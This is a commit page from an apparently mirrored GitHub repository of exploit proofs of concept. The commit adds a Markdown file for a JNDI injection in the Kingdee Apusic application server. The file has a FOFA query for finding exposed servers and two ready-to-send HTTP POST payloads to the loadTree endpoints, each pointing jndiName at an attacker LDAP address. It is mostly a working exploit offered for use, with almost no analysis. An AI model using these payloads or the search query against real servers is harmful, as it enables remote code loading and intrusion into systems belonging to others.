admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 金蝶Apusic应用服务器loadTree JNDI注入漏洞.md

Browse Source
This commit is contained in:
wy876 2023-12-27 20:07:06 +08:00 committed by GitHub
parent 14640075f4
commit b13e255ae4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
金蝶Apusic应用服务器loadTree JNDI注入漏洞.md Normal file
View File

@ -0,0 +1,28 @@
## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
## fofa
```
app="Apusic应用服务器"
```
## poc
```
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1
jndiName==ldap://地址
POST /admin/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1
jndiName==ldap://地址
```
![a519acd405e2e60c00108378f8410c8d](https://github.com/wy876/POC/assets/139549762/faa32ae9-f7b0-4a76-9990-74635d28bd2f)
![1dc3f827f335c01618f9dd9c4b39832b](https://github.com/wy876/POC/assets/139549762/6eff9f3b-df75-4008-b713-db61a32739bd)
![584c726b09f954433d5c3248ac5c1368](https://github.com/wy876/POC/assets/139549762/dfe99f4f-d6eb-4869-a2f8-59d792d9dac4)
##漏洞来源
- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw